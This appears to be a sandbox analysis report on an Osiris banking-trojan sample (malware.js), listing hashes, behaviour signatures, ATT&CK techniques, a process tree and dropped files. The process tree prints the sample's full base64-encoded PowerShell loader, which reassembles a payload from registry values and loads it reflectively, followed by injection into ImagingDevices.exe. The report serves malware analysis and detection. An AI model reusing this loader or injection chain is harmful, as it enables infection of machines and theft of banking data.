osiris | d0ac1b89cd4522882989b06c18ef2b80b05e07d64de1f562f79e2d631536fed3

General

Target

malware.js
Size

2.5MB
MD5

01ccfabf585a85f66195351871b9b467
SHA1

1b579fc4810d854da3bc59cc0024a368387423e4
SHA256

d0ac1b89cd4522882989b06c18ef2b80b05e07d64de1f562f79e2d631536fed3
SHA512

ce08769df3983ed9dd53189dcc1ad1887112cc65c8633a1fe333176afbe55194473e601df3c0757a0e2066d0c4b372f69e3706e5fa0d805dffec326807fdb05e

Score

10^/10

osiris banker botnet

Malware Config

Signatures

Osiris
banker botnet osiris
Executes dropped EXE 1 IoCs

Processes:

GetX64BTIT.exe

pid process

2196 GetX64BTIT.exe
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow ioc

14 api.ipify.org
15 api.ipify.org
Uses Tor communications 1 TTPs
Malware can proxy its traffic through Tor for more anonymity.

Connection Proxy
T1090
Suspicious use of SetThreadContext 1 IoCs

Processes:

powershell.exe

description pid process target process

PID 3724 set thread context of 788 3724 powershell.exe ImagingDevices.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

pid	process
2196	GetX64BTIT.exe

flow	ioc
14	api.ipify.org
15	api.ipify.org

description	pid	process	target process
PID 3724 set thread context of 788	3724	powershell.exe	ImagingDevices.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

powershell.exeImagingDevices.exe

pid	process
3724	powershell.exe
3724	powershell.exe
3724	powershell.exe
3724	powershell.exe
3724	powershell.exe
788	ImagingDevices.exe
788	ImagingDevices.exe
788	ImagingDevices.exe
788	ImagingDevices.exe
788	ImagingDevices.exe
788	ImagingDevices.exe
788	ImagingDevices.exe
788	ImagingDevices.exe
788	ImagingDevices.exe
788	ImagingDevices.exe
788	ImagingDevices.exe
788	ImagingDevices.exe
788	ImagingDevices.exe
788	ImagingDevices.exe
788	ImagingDevices.exe
788	ImagingDevices.exe
788	ImagingDevices.exe
788	ImagingDevices.exe
788	ImagingDevices.exe
788	ImagingDevices.exe
788	ImagingDevices.exe
788	ImagingDevices.exe
788	ImagingDevices.exe
788	ImagingDevices.exe
788	ImagingDevices.exe
788	ImagingDevices.exe
788	ImagingDevices.exe
788	ImagingDevices.exe
788	ImagingDevices.exe
788	ImagingDevices.exe
788	ImagingDevices.exe
788	ImagingDevices.exe
788	ImagingDevices.exe
788	ImagingDevices.exe
788	ImagingDevices.exe
788	ImagingDevices.exe
788	ImagingDevices.exe
788	ImagingDevices.exe
788	ImagingDevices.exe
788	ImagingDevices.exe
788	ImagingDevices.exe
788	ImagingDevices.exe
788	ImagingDevices.exe
788	ImagingDevices.exe
788	ImagingDevices.exe
788	ImagingDevices.exe
788	ImagingDevices.exe
788	ImagingDevices.exe
788	ImagingDevices.exe
788	ImagingDevices.exe
788	ImagingDevices.exe
788	ImagingDevices.exe
788	ImagingDevices.exe
788	ImagingDevices.exe
788	ImagingDevices.exe
788	ImagingDevices.exe
788	ImagingDevices.exe
788	ImagingDevices.exe
788	ImagingDevices.exe

Suspicious use of AdjustPrivilegeToken 1 IoCs

Processes:

powershell.exe

description pid process

Token: SeDebugPrivilege 3724 powershell.exe
Suspicious use of SetWindowsHookEx 1 IoCs

Processes:

ImagingDevices.exe

pid process

788 ImagingDevices.exe

description	pid	process
Token: SeDebugPrivilege	3724	powershell.exe

pid	process
788	ImagingDevices.exe

Suspicious use of WriteProcessMemory 20 IoCs

Processes:

wscript.execmd.exepowershell.exeImagingDevices.exe

description	pid	process	target process
PID 656 wrote to memory of 3136	656	wscript.exe	cmd.exe
PID 656 wrote to memory of 3136	656	wscript.exe	cmd.exe
PID 3136 wrote to memory of 3724	3136	cmd.exe	powershell.exe
PID 3136 wrote to memory of 3724	3136	cmd.exe	powershell.exe
PID 3136 wrote to memory of 3724	3136	cmd.exe	powershell.exe
PID 3724 wrote to memory of 3384	3724	powershell.exe	ImagingDevices.exe
PID 3724 wrote to memory of 3384	3724	powershell.exe	ImagingDevices.exe
PID 3724 wrote to memory of 3384	3724	powershell.exe	ImagingDevices.exe
PID 3724 wrote to memory of 788	3724	powershell.exe	ImagingDevices.exe
PID 3724 wrote to memory of 788	3724	powershell.exe	ImagingDevices.exe
PID 3724 wrote to memory of 788	3724	powershell.exe	ImagingDevices.exe
PID 3724 wrote to memory of 788	3724	powershell.exe	ImagingDevices.exe
PID 3724 wrote to memory of 788	3724	powershell.exe	ImagingDevices.exe
PID 3724 wrote to memory of 788	3724	powershell.exe	ImagingDevices.exe
PID 3724 wrote to memory of 788	3724	powershell.exe	ImagingDevices.exe
PID 3724 wrote to memory of 788	3724	powershell.exe	ImagingDevices.exe
PID 3724 wrote to memory of 788	3724	powershell.exe	ImagingDevices.exe
PID 3724 wrote to memory of 788	3724	powershell.exe	ImagingDevices.exe
PID 788 wrote to memory of 2196	788	ImagingDevices.exe	GetX64BTIT.exe
PID 788 wrote to memory of 2196	788	ImagingDevices.exe	GetX64BTIT.exe

C:\Windows\system32\wscript.exe
wscript.exe C:\Users\Admin\AppData\Local\Temp\malware.js
1⤵
- Suspicious use of WriteProcessMemory
PID:656
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -En "PAAjACAAdQB2AHgAdgByAGwAIAAjAD4AJAB1AD0AJABlAG4AdgA6AFUAcwBlAHIATgBhAG0AZQA7AGYAbwByACAAKAAkAGkAPQAwADsAJABpACAALQBsAGUAIAA3ADAAMAA7ACQAaQArACsAKQB7ACQAYwA9ACIASABLAEMAVQA6AFwAUwBPAEYAVABXAEEAUgBFAFwAIgArACQAdQArACIAMQAiADsAVAByAHkAewAkAGEAPQAkAGEAKwAoAEcAZQB0AC0ASQB0AGUAbQBQAHIAbwBwAGUAcgB0AHkAIAAtAHAAYQB0AGgAIAAkAGMAKQAuACQAaQB9AEMAYQB0AGMAaAB7AH0AfQA7AGYAdQBuAGMAdABpAG8AbgAgAGMAaABiAGEAewBbAGMAbQBkAGwAZQB0AGIAaQBuAGQAaQBuAGcAKAApAF0AcABhAHIAYQBtACgAWwBwAGEAcgBhAG0AZQB0AGUAcgAoAE0AYQBuAGQAYQB0AG8AcgB5AD0AJAB0AHIAdQBlACkAXQBbAFMAdAByAGkAbgBnAF0AJABoAHMAKQA7ACQAQgB5AHQAZQBzACAAPQAgAFsAYgB5AHQAZQBbAF0AXQA6ADoAbgBlAHcAKAAkAGgAcwAuAEwAZQBuAGcAdABoACAALwAgADIAKQA7AGYAbwByACgAJABpAD0AMAA7ACAAJABpACAALQBsAHQAIAAkAGgAcwAuAEwAZQBuAGcAdABoADsAIAAkAGkAKwA9ADIAKQB7ACQAQgB5AHQAZQBzAFsAJABpAC8AMgBdACAAPQAgAFsAYwBvAG4AdgBlAHIAdABdADoAOgBUAG8AQgB5AHQAZQAoACQAaABzAC4AUwB1AGIAcwB0AHIAaQBuAGcAKAAkAGkALAAgADIAKQAsACAAMQA2ACkAfQAkAEIAeQB0AGUAcwB9ADsAJABpACAAPQAgADAAOwBXAGgAaQBsAGUAIAAoACQAVAByAHUAZQApAHsAJABpACsAKwA7ACQAawBvACAAPQAgAFsAbQBhAHQAaABdADoAOgBTAHEAcgB0ACgAJABpACkAOwBpAGYAIAAoACQAawBvACAALQBlAHEAIAAxADAAMAAwACkAewAgAGIAcgBlAGEAawB9AH0AWwBiAHkAdABlAFsAXQBdACQAYgAgAD0AIABjAGgAYgBhACgAJABhAC4AcgBlAHAAbABhAGMAZQAoACIAIwAiACwAJABrAG8AKQApADsAWwBSAGUAZgBsAGUAYwB0AGkAbwBuAC4AQQBzAHMAZQBtAGIAbAB5AF0AOgA6AEwAbwBhAGQAKAAkAGIAKQA7AFsATQBvAGQAZQBdADoAOgBTAGUAdAB1AHAAKAApADsA "
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:3136
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -En "PAAjACAAdQB2AHgAdgByAGwAIAAjAD4AJAB1AD0AJABlAG4AdgA6AFUAcwBlAHIATgBhAG0AZQA7AGYAbwByACAAKAAkAGkAPQAwADsAJABpACAALQBsAGUAIAA3ADAAMAA7ACQAaQArACsAKQB7ACQAYwA9ACIASABLAEMAVQA6AFwAUwBPAEYAVABXAEEAUgBFAFwAIgArACQAdQArACIAMQAiADsAVAByAHkAewAkAGEAPQAkAGEAKwAoAEcAZQB0AC0ASQB0AGUAbQBQAHIAbwBwAGUAcgB0AHkAIAAtAHAAYQB0AGgAIAAkAGMAKQAuACQAaQB9AEMAYQB0AGMAaAB7AH0AfQA7AGYAdQBuAGMAdABpAG8AbgAgAGMAaABiAGEAewBbAGMAbQBkAGwAZQB0AGIAaQBuAGQAaQBuAGcAKAApAF0AcABhAHIAYQBtACgAWwBwAGEAcgBhAG0AZQB0AGUAcgAoAE0AYQBuAGQAYQB0AG8AcgB5AD0AJAB0AHIAdQBlACkAXQBbAFMAdAByAGkAbgBnAF0AJABoAHMAKQA7ACQAQgB5AHQAZQBzACAAPQAgAFsAYgB5AHQAZQBbAF0AXQA6ADoAbgBlAHcAKAAkAGgAcwAuAEwAZQBuAGcAdABoACAALwAgADIAKQA7AGYAbwByACgAJABpAD0AMAA7ACAAJABpACAALQBsAHQAIAAkAGgAcwAuAEwAZQBuAGcAdABoADsAIAAkAGkAKwA9ADIAKQB7ACQAQgB5AHQAZQBzAFsAJABpAC8AMgBdACAAPQAgAFsAYwBvAG4AdgBlAHIAdABdADoAOgBUAG8AQgB5AHQAZQAoACQAaABzAC4AUwB1AGIAcwB0AHIAaQBuAGcAKAAkAGkALAAgADIAKQAsACAAMQA2ACkAfQAkAEIAeQB0AGUAcwB9ADsAJABpACAAPQAgADAAOwBXAGgAaQBsAGUAIAAoACQAVAByAHUAZQApAHsAJABpACsAKwA7ACQAawBvACAAPQAgAFsAbQBhAHQAaABdADoAOgBTAHEAcgB0ACgAJABpACkAOwBpAGYAIAAoACQAawBvACAALQBlAHEAIAAxADAAMAAwACkAewAgAGIAcgBlAGEAawB9AH0AWwBiAHkAdABlAFsAXQBdACQAYgAgAD0AIABjAGgAYgBhACgAJABhAC4AcgBlAHAAbABhAGMAZQAoACIAIwAiACwAJABrAG8AKQApADsAWwBSAGUAZgBsAGUAYwB0AGkAbwBuAC4AQQBzAHMAZQBtAGIAbAB5AF0AOgA6AEwAbwBhAGQAKAAkAGIAKQA7AFsATQBvAGQAZQBdADoAOgBTAGUAdAB1AHAAKAApADsA "
    3⤵
    - Suspicious use of SetThreadContext
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:3724
  - - C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe
      "C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe"
      4⤵
      PID:3384
  - - C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe
      "C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe"
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of SetWindowsHookEx
      Suspicious use of WriteProcessMemory
      PID:788
    - - C:\Users\Admin\AppData\Local\Temp\GetX64BTIT.exe
        
        "C:\Users\Admin\AppData\Local\Temp\GetX64BTIT.exe"
        5⤵
        Executes dropped EXE
        
        PID:2196

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Connection Proxy

1

T1090

Credential Access

Discovery

System Information Discovery

1

T1082

Lateral Movement

Collection

Command and Control

Connection Proxy

1

T1090

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\GetX64BTIT.exe

MD5
b4cd27f2b37665f51eb9fe685ec1d373

SHA1
7f08febf0fdb7fc9f8bf35a10fb11e7de431abe0

SHA256
91f1023142b7babf6ff75dad984c2a35bde61dc9e61f45483f4b65008576d581

SHA512
e025f65224d78f5fd0abebe281ac0d44a385b2641e367cf39eed6aefada20a112ac47f94d7febc4424f1db6a6947bac16ff83ef93a8d745b3cddfdbe64c49a1e

Download Submit
C:\Users\Admin\AppData\Local\Temp\GetX64BTIT.exe

MD5
b4cd27f2b37665f51eb9fe685ec1d373

SHA1
7f08febf0fdb7fc9f8bf35a10fb11e7de431abe0

SHA256
91f1023142b7babf6ff75dad984c2a35bde61dc9e61f45483f4b65008576d581

SHA512
e025f65224d78f5fd0abebe281ac0d44a385b2641e367cf39eed6aefada20a112ac47f94d7febc4424f1db6a6947bac16ff83ef93a8d745b3cddfdbe64c49a1e

Download Submit
C:\Users\Admin\AppData\Local\Temp\x64btit.txt

MD5
14f8904cf8d36877990fa4f0743a8396

SHA1
8429f1370f2f08ddb81a06b16e0f40c309309ea3

SHA256
42fe128c1f7cdef6532a8228d19a21dead95fef57ed326d64cb3833d347081c9

SHA512
f7f6dcb8b0145362610e66b03ba55ad5fb9304ec5a713d8873b6b22b993d5ce7d248354adac9d285dd1d22a1e8678ff821d748cb8662fe39704a3ea8f8045469

Download Submit
memory/788-143-0x0000000000400000-0x0000000000456000-memory.dmp

Filesize
344KB

Download
memory/788-149-0x0000000000400000-0x0000000000456000-memory.dmp

Filesize
344KB

Download
memory/788-150-0x0000000003200000-0x000000000334A000-memory.dmp

Filesize
1.3MB

Download
memory/788-144-0x0000000000401698-mapping.dmp

Download
memory/2196-153-0x0000000000000000-mapping.dmp

Download
memory/3136-114-0x0000000000000000-mapping.dmp

Download
memory/3724-123-0x0000000007930000-0x0000000007931000-memory.dmp

Filesize
4KB

Download
memory/3724-140-0x0000000009470000-0x00000000095BC000-memory.dmp

Filesize
1.3MB

Download
memory/3724-127-0x00000000082D0000-0x00000000082D1000-memory.dmp

Filesize
4KB

Download
memory/3724-128-0x0000000008250000-0x0000000008251000-memory.dmp

Filesize
4KB

Download
memory/3724-133-0x00000000092C0000-0x00000000092C1000-memory.dmp

Filesize
4KB

Download
memory/3724-134-0x0000000008F90000-0x0000000008F91000-memory.dmp

Filesize
4KB

Download
memory/3724-135-0x0000000009010000-0x0000000009011000-memory.dmp

Filesize
4KB

Download
memory/3724-136-0x0000000009860000-0x0000000009861000-memory.dmp

Filesize
4KB

Download
memory/3724-137-0x0000000009090000-0x0000000009092000-memory.dmp

Filesize
8KB

Download
memory/3724-126-0x0000000007F20000-0x0000000007F21000-memory.dmp

Filesize
4KB

Download
memory/3724-125-0x0000000007B10000-0x0000000007B11000-memory.dmp

Filesize
4KB

Download
memory/3724-124-0x0000000007AA0000-0x0000000007AA1000-memory.dmp

Filesize
4KB

Download
memory/3724-122-0x0000000007080000-0x0000000007081000-memory.dmp

Filesize
4KB

Download
memory/3724-151-0x0000000004A63000-0x0000000004A64000-memory.dmp

Filesize
4KB

Download
memory/3724-120-0x0000000004A60000-0x0000000004A61000-memory.dmp

Filesize
4KB

Download
memory/3724-121-0x0000000004A62000-0x0000000004A63000-memory.dmp

Filesize
4KB

Download
memory/3724-119-0x0000000007130000-0x0000000007131000-memory.dmp

Filesize
4KB

Download
memory/3724-118-0x0000000004A70000-0x0000000004A71000-memory.dmp

Filesize
4KB

Download
memory/3724-115-0x0000000000000000-mapping.dmp

Download

Analysis

Sharing